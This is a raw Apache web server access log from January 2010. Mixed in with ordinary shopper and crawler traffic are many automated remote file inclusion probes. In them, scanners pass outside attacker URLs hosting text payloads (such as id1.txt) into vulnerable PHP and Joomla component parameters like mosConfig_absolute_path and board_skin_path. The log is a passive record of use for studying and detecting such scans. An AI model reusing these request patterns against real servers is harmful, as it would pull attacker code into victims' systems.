70.171.122.85 - - [05/Jan/2010:00:29:46 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
70.171.122.85 - - [05/Jan/2010:00:29:55 -0500] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1195EB5E54C3A3003D1F06K+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
70.171.122.85 - - [05/Jan/2010:00:29:56 -0500] "GET /images/items/05560000_FULL.JPG HTTP/1.1" 200 12293 "http://www.aceonlinestore.com/cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1195EB5E54C3A3003D1F06K+WSEQ(S0060):1+OUITEM(A0200):05560000" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
211.232.85.247 - - [05/Jan/2010:00:30:07 -0500] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:30:07 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:30:10 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.171.122.85 - - [05/Jan/2010:00:30:14 -0500] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1195EB5E54C3A3003D1F06K+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
220.181.7.85 - - [05/Jan/2010:00:31:48 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
94.124.120.47 - - [05/Jan/2010:00:32:02 -0500] "GET /logs//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:02 -0500] "GET /logs/access_log.Q109052300%20%20//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:02 -0500] "GET //administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET /logs/access_log.Q109052300%20%20//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET //administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET /logs//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET /logs/access_log.Q109052300//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET /logs/access_log.Q109052300%20%20//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET /logs//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:09 -0500] "GET //administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:11 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:11 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:11 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:13 -0500] "GET /logs/access_log.Q109052300//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:32:13 -0500] "GET /logs/access_log.Q109052300//administrator/components/compat_joomla1.5.php/compat.joomla1.5.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:16 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:16 -0500] "GET /logs/access_log.Q109102100%20%20//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:16 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:32:27 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:32:27 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:32:27 -0500] "GET /logs/access_log.Q109100200%20%20//modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:00:32:14 -0500] "GET /logs/error_log.Q109120600 HTTP/1.0" 200 1459633 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.113.237.37 - - [05/Jan/2010:00:32:48 -0500] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:48 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:32:50 -0500] "GET /logs/access_log.Q109091100%20%20//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:33:01 -0500] "GET /logs/access_log.Q109092100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:00:33:03 -0500] "GET /logs/access_log.Q109121000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:00:33:03 -0500] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:33:13 -0500] "GET /logs/access_log.Q109092100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:00:33:19 -0500] "GET /logs/error_log.Q109110500 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
174.21.92.41 - - [05/Jan/2010:00:33:32 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
174.21.92.41 - - [05/Jan/2010:00:33:32 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
174.21.92.41 - - [05/Jan/2010:00:33:45 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
174.21.92.41 - - [05/Jan/2010:00:33:45 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
209.59.12.99 - - [05/Jan/2010:00:33:54 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.77 - - [05/Jan/2010:00:34:10 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.55.15.194 - - [05/Jan/2010:00:35:29 -0500] "GET /logs/access_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:00:35:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:00:35:29 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:35:33 -0500] "GET /logs/access_log.Q109051100//?_zb_path=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:35:33 -0500] "GET /logs/access_log.Q109051100//?_zb_path=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:00:35:37 -0500] "GET /logs/error_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:35:44 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:35:45 -0500] "GET /logs/access_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:35:45 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:35:48 -0500] "GET /logs/access_log.Q109103000//?_zb_path=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:35:49 -0500] "GET /logs/access_log.Q109103000//?_zb_path=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:35:51 -0500] "GET /logs/error_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:00:35:54 -0500] "GET /logs/access_log.Q109121000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
202.131.226.52 - - [05/Jan/2010:00:35:54 -0500] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:36:10 -0500] "GET /logs/access_log.Q109100200//modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:36:37 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:36:37 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:36:37 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.113.237.37 - - [05/Jan/2010:00:36:38 -0500] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://locationviewer.net/tech72//skin_shop/standard/test/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:36:41 -0500] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:00:36:51 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:00:36:51 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:00:36:51 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:00:36:55 -0500] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:37:10 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:37:10 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:00:37:10 -0500] "GET /logs/access_log.Q109092300%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
216.131.95.183 - - [05/Jan/2010:00:37:47 -0500] "GET //catalog.php?cid='' HTTP/1.1" 404 210 "-" "libwww-perl/5.831"
115.68.3.94 - - [05/Jan/2010:00:38:02 -0500] "GET /logs/access_log.Q109072200//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:38:22 -0500] "GET //setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:38:22 -0500] "GET /logs/access_log.Q109121000%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:38:22 -0500] "GET /logs//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:38:36 -0500] "GET /logs/access_log.Q109102100//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:38:39 -0500] "GET /logs/access_log.Q109051700//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:38:45 -0500] "GET /logs/access_log.Q109102100//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:00:38:49 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.254.218.44 - - [05/Jan/2010:00:38:50 -0500] "GET /logs/access_log.Q109121000%20%20//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:38:50 -0500] "GET /logs//setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.254.218.44 - - [05/Jan/2010:00:38:50 -0500] "GET //setup.php?dir=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:38:53 -0500] "GET /logs/access_log.Q109091100//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:00:38:57 -0500] "GET /logs/access_log.Q109091100//?_SERVER[DOCUMENT_ROOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:00:40:10 -0500] "GET /logs/access_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.218.116.132 - - [05/Jan/2010:00:40:02 -0500] "GET /logs/error_log.Q109112400 HTTP/1.0" 200 1968304 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.55.15.194 - - [05/Jan/2010:00:40:14 -0500] "GET /logs/error_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:40:25 -0500] "GET /logs/access_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:25 -0500] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:25 -0500] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:25 -0500] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:40:29 -0500] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:31 -0500] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:31 -0500] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:31 -0500] "GET /logs/access_log.Q109082500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:40 -0500] "GET /logs/access_log.Q109080500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:00:40:50 -0500] "GET /logs/access_log.Q109080500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:00:41:06 -0500] "GET /logs/access_log.Q109081000 HTTP/1.1" 200 5307504 "-" "Yandex/1.01.001 (compatible; Win16; I)"
61.47.7.71 - - [05/Jan/2010:00:42:11 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:11 -0500] "GET /logs/access_log.Q109092300/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:11 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:12 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:15 -0500] "GET /logs/access_log.Q109092300/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:15 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:16 -0500] "GET /logs/access_log.Q109082000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:00:42:23 -0500] "GET /logs/access_log.Q109082000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:00:42:51 -0500] "GET /logs/shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:00:42:51 -0500] "GET /shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:00:42:51 -0500] "GET /logs/access_log.Q109080700%20%20/shop.php?prod=http://musicadelibreria.net/footer? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:43:04 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:43:04 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:43:05 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:00:43:05 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:00:43:38 -0500] "GET /logs/access_log.Q109101500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:00:43:49 -0500] "GET /logs/access_log.Q109101500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:00:43:51 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.227.82.174 - - [05/Jan/2010:00:44:23 -0500] "GET /logs/error_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:28 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
